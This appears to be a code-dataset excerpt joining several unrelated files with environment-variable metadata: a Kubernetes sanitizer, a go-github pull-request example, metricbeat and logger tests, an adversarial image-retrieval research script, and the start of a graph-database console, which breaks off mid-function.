"bytes"
"context"
"encoding/xml"
"errors"
"fmt"
"io"
"os"
"path/filepath"
"sort"
"time"
"github.com/aws/aws-sdk-go/aws"
"github.com/aws/aws-sdk-go/aws/session"
"github.com/aws/aws-sdk-go/service/s3/s3manager"
"github.com/derailed/popeye/internal"
"github.com/derailed/popeye/internal/issues"
"github.com/derailed/popeye/internal/k8s"
"github.com/derailed/popeye/internal/report"
"github.com/derailed/popeye/internal/sanitize"
"github.com/derailed/popeye/internal/scrub"
"github.com/derailed/popeye/pkg/config"
"github.com/rs/zerolog"
"github.com/rs/zerolog/log"
)
var (
// LogFile the path to our logs.
LogFile = filepath.Join(os.TempDir(), fmt.Sprintf("popeye.log"))
// DumpDir indicates a directory location for sanitixer reports.
DumpDir = dumpDir()
)
const outFmt = "sanitizer_%s_%d.%s"
func (p *Popeye) fileName() string {
return fmt.Sprintf(outFmt, p.client.ActiveCluster(), time.Now().UnixNano(), p.fileExt())
}
func (p *Popeye) fileExt() string {
switch *p.flags.Output {
case "json":
return "json"
case "junit":
return "xml"
case "yaml":
return "yml"
case "html":
return "html"
default:
return "txt"
}
}
func dumpDir() string {
if d := os.Getenv("POPEYE_REPORT_DIR"); d != "" {
return d
}
return filepath.Join(os.TempDir(), "popeye")
}
type (
scrubFn func(context.Context, *scrub.Cache, *issues.Codes) scrub.Sanitizer
// Popeye a kubernetes sanitizer.
Popeye struct {
client *k8s.Client
config *config.Config
outputTarget io.ReadWriteCloser
log *zerolog.Logger
flags *config.Flags
builder *report.Builder
aliases *internal.Aliases
}
)
// NewPopeye returns a new sanitizer.
func NewPopeye(flags *config.Flags, log *zerolog.Logger) (*Popeye, error) {
cfg, err := config.NewConfig(flags)
if err != nil {
return nil, err
}
a := internal.NewAliases()
p := Popeye{
client: k8s.NewClient(flags),
config: cfg,
log: log,
flags: flags,
aliases: a,
builder: report.NewBuilder(a),
}
return &p, nil
}
// Init configures popeye prior to sanitization.
func (p *Popeye) Init() error {
if !isSet(p.flags.Save) {
return p.ensureOutput()
}
if err := ensurePath(DumpDir, 0755); err != nil {
return err
}
return p.ensureOutput()
}
// Sanitize scans a cluster for potential issues.
func (p *Popeye) Sanitize() error {
defer func() {
switch {
case isSet(p.flags.Save):
if err := p.outputTarget.Close(); err != nil {
log.Fatal().Err(err).Msg("Closing report")
}
case isSetStr(p.flags.S3Bucket):
// Create a single AWS session (we can re use this if we're uploading many files)
s, err := session.NewSession(&aws.Config{
LogLevel: aws.LogLevel(aws.LogDebugWithRequestErrors)})
if err != nil {
log.Fatal().Err(err).Msg("Create S3 Session")
}
// Create an uploader with the session and default options
uploader := s3manager.NewUploader(s)
// Upload input parameters
upParams := &s3manager.UploadInput{
Bucket: p.flags.S3Bucket,
Key: aws.String(p.fileName()),
Body: p.outputTarget,
}
// Perform an upload.
if _, err = uploader.Upload(upParams); err != nil {
log.Fatal().Err(err).Msg("S3 Upload")
}
default:
}
}()
if err := p.sanitize(); err != nil {
return err
}
return p.dump(true)
}
func (p *Popeye) dumpJunit() error {
res, err := p.builder.ToJunit(config.Level(p.config.LinterLevel()))
if err != nil {
return err
}
if _, err := p.outputTarget.Write([]byte(xml.Header)); err != nil {
return err
}
fmt.Fprintf(p.outputTarget, "%v\n", res)
return nil
}
func (p *Popeye) dumpYAML() error {
res, err := p.builder.ToYAML()
if err != nil {
return err
}
fmt.Fprintf(p.outputTarget, "%v\n", res)
return nil
}
func (p *Popeye) dumpJSON() error {
res, err := p.builder.ToJSON()
if err != nil {
return err
}
fmt.Fprintf(p.outputTarget, "%v\n", res)
return nil
}
func (p *Popeye) dumpHTML() error {
res, err := p.builder.ToHTML()
if err != nil {
return err
}
fmt.Fprintf(p.outputTarget, "%v\n", res)
return nil
}
func (p *Popeye) dumpScore() error {
res, err := p.builder.ToScore()
if err != nil {
return err
}
fmt.Fprintf(p.outputTarget, "%v\n", res)
return nil
}
func (p *Popeye) dumpStd(mode, header bool) error {
var (
w = bufio.NewWriter(p.outputTarget)
s = report.NewSanitizer(w, mode)
)
if header {
p.builder.PrintHeader(s)
}
mx, err := p.client.ClusterHasMetrics()
if err != nil {
mx = false
}
p.builder.PrintClusterInfo(s, p.client.ActiveCluster(), mx)
p.builder.PrintReport(config.Level(p.config.LinterLevel()), s)
p.builder.PrintSummary(s)
return w.Flush()
}
func (p *Popeye) dumpPrometheus() error {
pusher := p.builder.ToPrometheus(
p.flags.PushGatewayAddress,
p.client.ActiveNamespace(),
)
return pusher.Add()
}
// Dump prints out sanitizer report.
func (p *Popeye) dump(printHeader bool) error {
if !p.builder.HasContent() {
return errors.New("Nothing to report, check section name or permissions")
}
p.builder.SetClusterName(p.client.ActiveCluster())
var err error
switch p.flags.OutputFormat() {
case report.JunitFormat:
err = p.dumpJunit()
case report.YAMLFormat:
err = p.dumpYAML()
case report.JSONFormat:
err = p.dumpJSON()
case report.HTMLFormat:
err = p.dumpHTML()
case report.PrometheusFormat:
err = p.dumpPrometheus()
case report.ScoreFormat:
err = p.dumpScore()
default:
err = p.dumpStd(p.flags.OutputFormat() == report.JurassicFormat, printHeader)
}
return err
}
func (p *Popeye) sanitizers() map[string]scrubFn {
return map[string]scrubFn{
"cluster": scrub.NewCluster,
"configmap": scrub.NewConfigMap,
"secret": scrub.NewSecret,
"deployment": scrub.NewDeployment,
"daemonset": scrub.NewDaemonSet,
"horizontalpodautoscaler": scrub.NewHorizontalPodAutoscaler,
"namespace": scrub.NewNamespace,
"node": scrub.NewNode,
"persistentvolume": scrub.NewPersistentVolume,
"persistentvolumeclaim": scrub.NewPersistentVolumeClaim,
"pod": scrub.NewPod,
"replicaset": scrub.NewReplicaSet,
"service": scrub.NewService,
"serviceaccount": scrub.NewServiceAccount,
"statefulset": scrub.NewStatefulSet,
"poddisruptionbudget": scrub.NewPodDisruptionBudget,
"ingress": scrub.NewIngress,
"networkpolicy": scrub.NewNetworkPolicy,
"podsecuritypolicy": scrub.NewPodSecurityPolicy,
"clusterrole": scrub.NewClusterRole,
"clusterrolebinding": scrub.NewClusterRoleBinding,
"role": scrub.NewRole,
"rolebinding": scrub.NewRoleBinding,
}
}
type readWriteCloser struct {
io.ReadWriter
}
// Close close read stream.
func (wC readWriteCloser) Close() error {
return nil
}
// NopWriter fake writer.
func NopWriter(i io.ReadWriter) io.ReadWriteCloser {
return &readWriteCloser{i}
}
func (p *Popeye) ensureOutput() error {
p.outputTarget = os.Stdout
if !isSet(p.flags.Save) && !isSetStr(p.flags.S3Bucket) {
return nil
}
if p.flags.Output == nil {
*p.flags.Output = "standard"
}
var (
f io.ReadWriteCloser
err error
)
switch {
case isSet(p.flags.Save):
fPath := filepath.Join(DumpDir, p.fileName())
f, err = os.Create(fPath)
if err != nil {
return err
}
fmt.Println(fPath)
case isSetStr(p.flags.S3Bucket):
f = NopWriter(bytes.NewBufferString(""))
}
p.outputTarget = f
return nil
}
func (p *Popeye) sanitize() error {
ctx, cancel := context.WithCancel(context.Background())
defer cancel()
ctx = context.WithValue(
ctx,
sanitize.PopeyeKey("OverAllocs"),
*p.flags.CheckOverAllocs,
)
cache := scrub.NewCache(p.client, p.config)
codes, err := issues.LoadCodes()
if err != nil {
return err
}
codes.Refine(p.config.Codes)
sections := make([]string, 0, len(p.sanitizers()))
for section := range p.sanitizers() {
sections = append(sections, section)
}
sort.StringSlice(sections).Sort()
for _, section := range sections {
if !in(p.aliases.ToResources(p.config.Sections()), section) {
continue
}
// Skip node checks if active namespace is set.
if section == "node" && p.client.ActiveNamespace() != "" {
continue
}
ctx = context.WithValue(ctx, internal.KeyRun, internal.RunInfo{Section: section})
s := p.sanitizers()[section](ctx, cache, codes)
if err := s.Sanitize(ctx); err != nil {
p.builder.AddError(err)
continue
}
o := s.Outcome().Filter(config.Level(p.config.LinterLevel()))
tally := report.NewTally()
tally.Rollup(o)
p.builder.AddSection(section, o, tally)
}
return nil
}
// ----------------------------------------------------------------------------
// Helpers...
func isSet(b *bool) bool {
return b != nil && *b
}
func isSetStr(s *string) bool {
return s != nil && *s != ""
}
func ensurePath(path string, mod os.FileMode) error {
dir, err := filepath.Abs(path)
if err != nil {
return err
}
_, err = os.Stat(dir)
if err == nil || !os.IsNotExist(err) {
return nil
}
if err = os.MkdirAll(dir, mod); err != nil {
return fmt.Errorf("Fail to create popeye sanitizers dump dir: %v", err)
}
return nil
}
func in(list []string, member string) bool {
if len(list) == 0 {
return true
}
for _, m := range list {
if m == member {
return true
}
}
return false
}
| [
"\"POPEYE_REPORT_DIR\""
]
| []
| [
"POPEYE_REPORT_DIR"
]
| [] | ["POPEYE_REPORT_DIR"] | go | 1 | 0 | |
vendor/github.com/google/go-github/example/commitpr/main.go | // Copyright 2018 The go-github AUTHORS. All rights reserved.
//
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// The commitpr command utilizes go-github as a CLI tool for
// pushing files to a branch and creating a pull request from it.
// It takes an auth token as an environment variable and creates
// the commit and the PR under the account affiliated with that token.
//
// The purpose of this example is to show how to use refs, trees and commits to
// create commits and pull requests.
//
// Note, if you want to push a single file, you probably prefer to use the
// content API. An example is available here:
// https://godoc.org/github.com/google/go-github/github#example-RepositoriesService-CreateFile
//
// Note, for this to work at least 1 commit is needed, so you if you use this
// after creating a repository you might want to make sure you set `AutoInit` to
// `true`.
package main
import (
"context"
"errors"
"flag"
"fmt"
"io/ioutil"
"log"
"os"
"strings"
"time"
"github.com/google/go-github/v26/github"
"golang.org/x/oauth2"
)
var (
sourceOwner = flag.String("source-owner", "", "Name of the owner (user or org) of the repo to create the commit in.")
sourceRepo = flag.String("source-repo", "", "Name of repo to create the commit in.")
commitMessage = flag.String("commit-message", "", "Content of the commit message.")
commitBranch = flag.String("commit-branch", "", "Name of branch to create the commit in. If it does not already exists, it will be created using the `base-branch` parameter")
baseBranch = flag.String("base-branch", "master", "Name of branch to create the `commit-branch` from.")
prRepoOwner = flag.String("merge-repo-owner", "", "Name of the owner (user or org) of the repo to create the PR against. If not specified, the value of the `-source-owner` flag will be used.")
prRepo = flag.String("merge-repo", "", "Name of repo to create the PR against. If not specified, the value of the `-source-repo` flag will be used.")
prBranch = flag.String("merge-branch", "master", "Name of branch to create the PR against (the one you want to merge your branch in via the PR).")
prSubject = flag.String("pr-title", "", "Title of the pull request. If not specified, no pull request will be created.")
prDescription = flag.String("pr-text", "", "Text to put in the description of the pull request.")
sourceFiles = flag.String("files", "", `Comma-separated list of files to commit and their location.
The local file is separated by its target location by a semi-colon.
If the file should be in the same location with the same name, you can just put the file name and omit the repetition.
Example: README.md,main.go:github/examples/commitpr/main.go`)
authorName = flag.String("author-name", "", "Name of the author of the commit.")
authorEmail = flag.String("author-email", "", "Email of the author of the commit.")
)
var client *github.Client
var ctx = context.Background()
// getRef returns the commit branch reference object if it exists or creates it
// from the base branch before returning it.
func getRef() (ref *github.Reference, err error) {
if ref, _, err = client.Git.GetRef(ctx, *sourceOwner, *sourceRepo, "refs/heads/"+*commitBranch); err == nil {
return ref, nil
}
// We consider that an error means the branch has not been found and needs to
// be created.
if *commitBranch == *baseBranch {
return nil, errors.New("The commit branch does not exist but `-base-branch` is the same as `-commit-branch`")
}
if *baseBranch == "" {
return nil, errors.New("The `-base-branch` should not be set to an empty string when the branch specified by `-commit-branch` does not exists")
}
var baseRef *github.Reference
if baseRef, _, err = client.Git.GetRef(ctx, *sourceOwner, *sourceRepo, "refs/heads/"+*baseBranch); err != nil {
return nil, err
}
newRef := &github.Reference{Ref: github.String("refs/heads/" + *commitBranch), Object: &github.GitObject{SHA: baseRef.Object.SHA}}
ref, _, err = client.Git.CreateRef(ctx, *sourceOwner, *sourceRepo, newRef)
return ref, err
}
// getTree generates the tree to commit based on the given files and the commit
// of the ref you got in getRef.
func getTree(ref *github.Reference) (tree *github.Tree, err error) {
// Create a tree with what to commit.
entries := []github.TreeEntry{}
// Load each file into the tree.
for _, fileArg := range strings.Split(*sourceFiles, ",") {
file, content, err := getFileContent(fileArg)
if err != nil {
return nil, err
}
entries = append(entries, github.TreeEntry{Path: github.String(file), Type: github.String("blob"), Content: github.String(string(content)), Mode: github.String("100644")})
}
tree, _, err = client.Git.CreateTree(ctx, *sourceOwner, *sourceRepo, *ref.Object.SHA, entries)
return tree, err
}
// getFileContent loads the local content of a file and return the target name
// of the file in the target repository and its contents.
func getFileContent(fileArg string) (targetName string, b []byte, err error) {
var localFile string
files := strings.Split(fileArg, ":")
switch {
case len(files) < 1:
return "", nil, errors.New("empty `-files` parameter")
case len(files) == 1:
localFile = files[0]
targetName = files[0]
default:
localFile = files[0]
targetName = files[1]
}
b, err = ioutil.ReadFile(localFile)
return targetName, b, err
}
// createCommit creates the commit in the given reference using the given tree.
func pushCommit(ref *github.Reference, tree *github.Tree) (err error) {
// Get the parent commit to attach the commit to.
parent, _, err := client.Repositories.GetCommit(ctx, *sourceOwner, *sourceRepo, *ref.Object.SHA)
if err != nil {
return err
}
// This is not always populated, but is needed.
parent.Commit.SHA = parent.SHA
// Create the commit using the tree.
date := time.Now()
author := &github.CommitAuthor{Date: &date, Name: authorName, Email: authorEmail}
commit := &github.Commit{Author: author, Message: commitMessage, Tree: tree, Parents: []github.Commit{*parent.Commit}}
newCommit, _, err := client.Git.CreateCommit(ctx, *sourceOwner, *sourceRepo, commit)
if err != nil {
return err
}
// Attach the commit to the master branch.
ref.Object.SHA = newCommit.SHA
_, _, err = client.Git.UpdateRef(ctx, *sourceOwner, *sourceRepo, ref, false)
return err
}
// createPR creates a pull request. Based on: https://godoc.org/github.com/google/go-github/github#example-PullRequestsService-Create
func createPR() (err error) {
if *prSubject == "" {
return errors.New("missing `-pr-title` flag; skipping PR creation")
}
if *prRepoOwner != "" && *prRepoOwner != *sourceOwner {
*commitBranch = fmt.Sprintf("%s:%s", *sourceOwner, *commitBranch)
} else {
prRepoOwner = sourceOwner
}
if *prRepo == "" {
prRepo = sourceRepo
}
newPR := &github.NewPullRequest{
Title: prSubject,
Head: commitBranch,
Base: prBranch,
Body: prDescription,
MaintainerCanModify: github.Bool(true),
}
pr, _, err := client.PullRequests.Create(ctx, *prRepoOwner, *prRepo, newPR)
if err != nil {
return err
}
fmt.Printf("PR created: %s\n", pr.GetHTMLURL())
return nil
}
func main() {
flag.Parse()
token := os.Getenv("GITHUB_AUTH_TOKEN")
if token == "" {
log.Fatal("Unauthorized: No token present")
}
if *sourceOwner == "" || *sourceRepo == "" || *commitBranch == "" || *sourceFiles == "" || *authorName == "" || *authorEmail == "" {
log.Fatal("You need to specify a non-empty value for the flags `-source-owner`, `-source-repo`, `-commit-branch`, `-files`, `-author-name` and `-author-email`")
}
ts := oauth2.StaticTokenSource(&oauth2.Token{AccessToken: token})
tc := oauth2.NewClient(ctx, ts)
client = github.NewClient(tc)
ref, err := getRef()
if err != nil {
log.Fatalf("Unable to get/create the commit reference: %s\n", err)
}
if ref == nil {
log.Fatalf("No error where returned but the reference is nil")
}
tree, err := getTree(ref)
if err != nil {
log.Fatalf("Unable to create the tree based on the provided files: %s\n", err)
}
if err := pushCommit(ref, tree); err != nil {
log.Fatalf("Unable to create the commit: %s\n", err)
}
if err := createPR(); err != nil {
log.Fatalf("Error while creating the pull request: %s", err)
}
}
| [
"\"GITHUB_AUTH_TOKEN\""
]
| []
| [
"GITHUB_AUTH_TOKEN"
]
| [] | ["GITHUB_AUTH_TOKEN"] | go | 1 | 0 | |
vendor/github.com/elastic/beats/metricbeat/tests/system/test_kubernetes.py | import os
import metricbeat
import unittest
KUBERNETES_FIELDS = metricbeat.COMMON_FIELDS + ["kubernetes"]
class Test(metricbeat.BaseTest):
@unittest.skipUnless(metricbeat.INTEGRATION_TESTS, "integration test")
def test_kubelet_node(self):
""" Kubernetes kubelet node metricset tests """
self._test_metricset('node', 1, self.get_kubelet_hosts())
@unittest.skipUnless(metricbeat.INTEGRATION_TESTS, "integration test")
def test_kubelet_system(self):
""" Kubernetes kubelet system metricset tests """
self._test_metricset('system', 2, self.get_kubelet_hosts())
@unittest.skipUnless(metricbeat.INTEGRATION_TESTS, "integration test")
def test_kubelet_pod(self):
""" Kubernetes kubelet pod metricset tests """
self._test_metricset('pod', 1, self.get_kubelet_hosts())
@unittest.skipUnless(metricbeat.INTEGRATION_TESTS, "integration test")
def test_kubelet_container(self):
""" Kubernetes kubelet container metricset tests """
self._test_metricset('container', 1, self.get_kubelet_hosts())
@unittest.skipUnless(metricbeat.INTEGRATION_TESTS, "integration test")
def test_state_node(self):
""" Kubernetes state node metricset tests """
self._test_metricset('state_node', 1, self.get_kube_state_hosts())
@unittest.skipUnless(metricbeat.INTEGRATION_TESTS, "integration test")
def test_state_pod(self):
""" Kubernetes state pod metricset tests """
self._test_metricset('state_pod', 1, self.get_kube_state_hosts())
@unittest.skipUnless(metricbeat.INTEGRATION_TESTS, "integration test")
def test_state_container(self):
""" Kubernetes state container metricset tests """
self._test_metricset('state_container', 1, self.get_kube_state_hosts())
def _test_metricset(self, metricset, expected_events, hosts):
self.render_config_template(modules=[{
"name": "kubernetes",
"enabled": "true",
"metricsets": [metricset],
"hosts": hosts,
"period": "5s"
}])
proc = self.start_beat()
self.wait_until(lambda: self.output_lines() > 0)
proc.check_kill_and_wait()
# Ensure no errors or warnings exist in the log.
log = self.get_log()
self.assertNotRegexpMatches(log.replace("WARN BETA", ""), "ERR|WARN")
output = self.read_output_json()
self.assertEqual(len(output), expected_events)
evt = output[0]
self.assertItemsEqual(self.de_dot(KUBERNETES_FIELDS), evt.keys(), evt)
self.assert_fields_are_documented(evt)
@classmethod
def get_kubelet_hosts(cls):
return [
"http://" +
os.getenv('KUBELET_HOST', 'localhost') + ':' +
os.getenv('KUBELET_PORT', '10255')
]
@classmethod
def get_kube_state_hosts(cls):
return [
"http://" +
os.getenv('KUBE_STATE_METRICS_HOST', 'localhost') + ':' +
os.getenv('KUBE_STATE_METRICS_PORT', '18080')
]
| []
| []
| [
"KUBE_STATE_METRICS_PORT",
"KUBE_STATE_METRICS_HOST",
"KUBELET_PORT",
"KUBELET_HOST"
]
| [] | ["KUBE_STATE_METRICS_PORT", "KUBE_STATE_METRICS_HOST", "KUBELET_PORT", "KUBELET_HOST"] | python | 4 | 0 | |
pkg/logger/logrus_test.go | package logger
import (
"bytes"
"encoding/json"
"os"
"strconv"
"strings"
"testing"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
)
const (
withJSON bool = true
withoutJSON bool = false
)
func logAndAssertContent(
t *testing.T,
config *Config,
log func(Logger),
withExpectedContent bool,
) {
var buffer bytes.Buffer
b := NewBuilder(config)
lLogger, err := b.BuildTestLogger(&buffer)
require.Nil(t, err)
log(lLogger)
content := buffer.String()
withActualContent := content != ""
assert.Equal(t, withExpectedContent, withActualContent)
}
func logAndAssertJSONFields(
t *testing.T,
config *Config,
log func(Logger),
assertions func(fields Fields),
) {
var buffer bytes.Buffer
var fields Fields
b := NewBuilder(config)
lLogger, err := b.BuildTestLogger(&buffer)
require.Nil(t, err)
log(lLogger)
err = json.Unmarshal(buffer.Bytes(), &fields)
assert.Nil(t, err)
assertions(fields)
}
func logAndAssertTextFields(
t *testing.T,
config *Config,
log func(Logger),
assertions func(fields map[string]string),
) {
var buffer bytes.Buffer
b := NewBuilder(config)
lLogger, err := b.BuildTestLogger(&buffer)
require.Nil(t, err)
log(lLogger)
fields := make(map[string]string)
for _, kv := range strings.Split(strings.TrimRight(buffer.String(), "\n"), " ") {
if !strings.Contains(kv, "=") {
continue
}
kvArr := strings.Split(kv, "=")
key := strings.TrimSpace(kvArr[0])
val := kvArr[1]
if kvArr[1][0] == '"' {
var err error
val, err = strconv.Unquote(val)
require.NoError(t, err)
}
fields[key] = val
}
assertions(fields)
}
func logConfigForTest(withJSONFormat bool) *Config {
return &Config{
ConsoleEnabled: true,
ConsoleJSONFormat: withJSONFormat,
ConsoleLevel: "trace",
}
}
// This test is proving the following:
// - the config enables JSON formatter and the output is a parseable JSON;
// - the config asks for level "trace" and above and the logger has output;
// - the formatter in the SDK is customized and the logger correctly use those
// key fields;
// - the formatter disables the logrus standard "msg" key in the field and
// the logger correctly doesn't show it;
func TestInfoLevelWithJSONFields(t *testing.T) {
messageContent := "test message"
logAndAssertJSONFields(
t,
logConfigForTest(withJSON),
func(log Logger) {
log.Infof(messageContent)
},
func(fields Fields) {
assert.Nil(t, fields["msg"])
assert.Equal(t, "info", fields["level"])
assert.NotEmpty(t, fields[fieldKeyTime])
assert.Equal(t, messageContent, fields[fieldKeyMsg])
},
)
}
func TestInfoLevelWithTextFields(t *testing.T) {
// Using an underscore as separator to simplify the parser
// in `logAndAssertTextFields`.
messageContent := "test_message"
logAndAssertTextFields(
t,
logConfigForTest(withoutJSON),
func(log Logger) {
log.Infof(messageContent)
},
func(fields map[string]string) {
assert.Empty(t, fields["msg"])
assert.Equal(t, "info", fields["level"])
assert.NotEmpty(t, fields[fieldKeyTime])
assert.Equal(t, messageContent, fields[fieldKeyMsg])
},
)
}
func TestLevelConfiguration(t *testing.T) {
t.Run("RunningWithLoggerInTestEnvironment", func(t *testing.T) {
expected := "test"
actual := os.Getenv("APP_ENV")
assert.Equal(t, expected, actual)
})
messageContent := "test message"
testCases := []struct {
name string
config *Config
log func(log Logger)
withExpectedContent bool
}{
{
name: "WhenConfigLevelIsTraceDebugIsLogged",
config: &Config{
ConsoleEnabled: true,
ConsoleJSONFormat: withJSON,
ConsoleLevel: "trace",
},
log: func(l Logger) {
l.Debugf(messageContent)
},
withExpectedContent: true,
},
{
name: "WhenConfigLevelIsWarnInfoIsNotLogged",
config: &Config{
ConsoleEnabled: true,
ConsoleJSONFormat: withJSON,
ConsoleLevel: "warn",
},
log: func(l Logger) {
l.Infof(messageContent)
},
withExpectedContent: false,
},
}
for _, tc := range testCases {
t.Run(tc.name, func(t *testing.T) {
logAndAssertContent(
t,
tc.config,
tc.log,
tc.withExpectedContent,
)
})
}
}
| [
"\"APP_ENV\""
]
| []
| [
"APP_ENV"
]
| [] | ["APP_ENV"] | go | 1 | 0 | |
test.py | from __future__ import print_function
import sys, time, copy, os, pdb, argparse, ast
from scipy.misc import imsave
import numpy as np
from PIL import Image
import matplotlib.pyplot as plt
import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.nn.functional as F
import torchvision.transforms as transforms
import torchvision.transforms.functional as TF
import torchvision.models as models
from torch.utils.model_zoo import load_url
from cirtorch.layers import pooling
from cirtorch.layers import normalization
from cirtorch.datasets.datahelpers import imresize
from cirtorchclone.imageretrievalnet import init_network
from tma import tma
from utils import *
gpu_id = '0'
train_scales = [300,350,400,450,500,550,600,650,700,750,800,850,900,950,1024]
test_scales = [1024]
iters = 100
lr = 0.01
lam = 0
sigma_blur = 0.3
carrier_fn = 'data/input/flower.jpg'
# carrier_fn = 'data/input/sanjuan.jpg'
target_fn = 'data/input/notredame.jpg'
mode = 'hist'
pool = mode
# mode = 'global'
# pool = 'gem'
arch = 'alexnet'
modellist = arch+"-"+pool
testarch = 'alexnet'
testpool = 'gem'
testmodellist = testarch+"-"+testpool
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]=gpu_id
output_folder = 'data/'
# list of training networks / pooling
net_params = {'local_whitening':False,'regional':False,'whitening':False,'pretrained':True} # default cir network params
test_networks = []
for s in testmodellist.split("+"):
net_params['architecture'] = s.split("-")[0]
for s2 in testmodellist.split("-")[1:]:
net_params['pooling'] = s2
test_networks.append(init_network(net_params))
train_networks = []
for s in modellist.split("+"):
net_params['architecture'] = s.split("-")[0]
train_networks.append(init_network(net_params))
if mode == 'global': train_networks[-1].poolattack = s.split("-")[1:]
for n in train_networks: n.eval(); n.cuda();
imsize = 1024
train_scale_factors = [x / imsize for x in train_scales]
test_scale_factors = [x / imsize for x in test_scales]
use_cuda = torch.cuda.is_available()
dtype = torch.cuda.FloatTensor if use_cuda else torch.FloatTensor
for n in train_networks: n.cuda(); n.eval()
for n in test_networks: n.eval()
def loader(image_name, im_size):
return Variable(TF.to_tensor(imresize(Image.open(image_name), im_size))).unsqueeze(0)
target_img = img_loader(target_fn, imsize).type(dtype)
carrier_img = img_loader(carrier_fn, imsize).type(dtype)
carrier_img = center_crop(target_img, carrier_img)
carrier_img_org = carrier_img.clone().clamp_(0, 1)
print("TARGET "+target_fn+" CARRIER " + carrier_fn)
t = time.time()
attack_img = tma(train_networks, train_scale_factors, target_img, carrier_img, mode = mode, num_steps = iters, lr = lr, lam = lam, sigma_blur = sigma_blur, verbose = True)[0]
print("Elapsed time {:.4f}\n".format(time.time()-t))
# save to disk
img2save = np.transpose(attack_img.cpu().numpy(), (2,3,1,0)).squeeze()
imsave(output_folder+'/attack_image.png',img2save)
img_df = (attack_img-carrier_img_org)
img_df = (img_df-img_df.min()) / (img_df.max()-img_df.min())
img2save = np.transpose(img_df.cpu().numpy(), (2,3,1,0)).squeeze()
imsave(output_folder+'/attack_carrier_diff.png',img2save)
print("Evaluate descriptor similarity")
eval_sim(test_networks, test_scale_factors, target_img, carrier_img_org, attack_img)
| []
| []
| [
"CUDA_DEVICE_ORDER",
"CUDA_VISIBLE_DEVICES"
]
| [] | ["CUDA_DEVICE_ORDER", "CUDA_VISIBLE_DEVICES"] | python | 2 | 0 | |
main.go | /* Copyright (c) 2020 vesoft inc. All rights reserved.
*
* This source code is licensed under Apache 2.0 License,
* attached with Common Clause Condition 1.0, found in the LICENSES directory.
*/
package main
import (
"flag"
"fmt"
"log"
"os"
"path"
"path/filepath"
"strconv"
"strings"
"time"
"github.com/vesoft-inc/nebula-console/cli"
"github.com/vesoft-inc/nebula-console/printer"
nebula "github.com/vesoft-inc/nebula-go"
)
// Console side commands
const (
Unknown = -1
Quit = 0
SetCsv = 1
UnsetCsv = 2
PlayData = 3
Sleep = 4
SetDot = 5
UnsetDot = 6
)
var dataSetPrinter = printer.NewDataSetPrinter()
var planDescPrinter = printer.NewPlanDescPrinter()
var datasets = map[string]string{
"nba": "./data/nba.ngql",
}
func welcome(interactive bool) {
defer dataSetPrinter.UnsetOutCsv()
defer planDescPrinter.UnsetOutDot()
if !interactive {
return
}
fmt.Println()
fmt.Printf("Welcome to Nebula Graph!\n")
fmt.Println()
}
func bye(username string, interactive bool) {
fmt.Println()
fmt.Printf("Bye %s!\n", username)
fmt.Println(time.Now().In(time.Local).Format(time.RFC1123))
fmt.Println()
}
func printConsoleResp(msg string) {
fmt.Println(msg)
fmt.Println()
fmt.Println(time.Now().In(time.Local).Format(time.RFC1123))
fmt.Println()
}
func playData(data string) (string, error) {
path, exist := datasets[data]
if !exist {
return "", fmt.Errorf("dataset %s, not existed", data)
}
fd, err := os.Open(path)
if err != nil {
return "", err
}
c := cli.NewnCli(fd, false, "", func() { fd.Close() })
c.PlayingData(true)
defer c.PlayingData(false)
fmt.Printf("Start loading dataset %s...\n", data)
childSession, err := pool.GetSession(*username, *password)
if err != nil {
log.Panicf("Fail to create a new session from connection pool, %s", err.Error())
}
defer childSession.Release()
err = loop(childSession, c)
if err != nil {
return "", err
}
respErr := c.GetRespError()
if respErr != "" {
return "", fmt.Errorf(respErr)
}
return c.GetSpace(), nil
}
// Console side cmd will not be sent to server
func isConsoleCmd(cmd string) (isLocal bool, localCmd int, args []string) {
// Currently, command "exit" and "quit" can also exit the console
if cmd == "exit" || cmd == "quit" {
isLocal = true
localCmd = Quit
return
}
plain := strings.TrimSpace(strings.ToLower(cmd))
if len(plain) < 1 || plain[0] != ':' {
return
}
isLocal = true
words := strings.Fields(plain[1:])
switch len(words) {
case 1:
if words[0] == "exit" || words[0] == "quit" {
localCmd = Quit
} else {
localCmd = Unknown
}
case 2:
if words[0] == "unset" && words[1] == "csv" {
localCmd = UnsetCsv
} else if words[0] == "unset" && words[1] == "dot" {
localCmd = UnsetDot
} else if words[0] == "sleep" {
localCmd = Sleep
args = []string{words[1]}
} else if words[0] == "play" {
localCmd = PlayData
args = []string{words[1]}
} else {
localCmd = Unknown
}
case 3:
if words[0] == "set" && words[1] == "csv" {
localCmd = SetCsv
args = []string{words[2]}
} else if words[0] == "set" && words[1] == "dot" {
localCmd = SetDot
args = []string{words[2]}
} else {
localCmd = Unknown
}
default:
localCmd = Unknown
}
return
}
func executeConsoleCmd(cmd int, args []string) (newSpace string) {
switch cmd {
case SetCsv:
dataSetPrinter.SetOutCsv(args[0])
case UnsetCsv:
dataSetPrinter.UnsetOutCsv()
case SetDot:
planDescPrinter.SetOutDot(args[0])
case UnsetDot:
planDescPrinter.UnsetOutDot()
case PlayData:
var err error
newSpace, err = playData(args[0])
if err != nil {
printConsoleResp("Error: load dataset failed, " + err.Error())
} else {
printConsoleResp("Load dataset succeeded!")
}
case Sleep:
i, err := strconv.Atoi(args[0])
if err != nil {
printConsoleResp("Error: invalid integer, " + err.Error())
}
time.Sleep(time.Duration(i) * time.Second)
default:
printConsoleResp("Error: this local command not exists!")
}
return newSpace
}
func printResultSet(res *nebula.ResultSet, duration time.Duration) {
if !res.IsSucceed() && !res.IsPartialSucceed() {
fmt.Printf("[ERROR (%d)]: %s", res.GetErrorCode(), res.GetErrorMsg())
fmt.Println()
fmt.Println()
return
}
// Show table
if res.IsSetData() {
dataSetPrinter.PrintDataSet(res)
numRows := res.GetRowSize()
if numRows > 0 {
fmt.Printf("Got %d rows (time spent %d/%d us)\n", numRows, res.GetLatency(), duration/1000)
} else {
fmt.Printf("Empty set (time spent %d/%d us)\n", res.GetLatency(), duration/1000)
}
} else {
fmt.Printf("Execution succeeded (time spent %d/%d us)\n", res.GetLatency(), duration/1000)
}
if res.IsPartialSucceed() {
fmt.Println()
fmt.Printf("[WARNING]: Got partial result.")
}
if res.IsSetComment() {
fmt.Println()
fmt.Printf("[WARNING]: %s", res.GetComment())
}
if res.IsSetPlanDesc() {
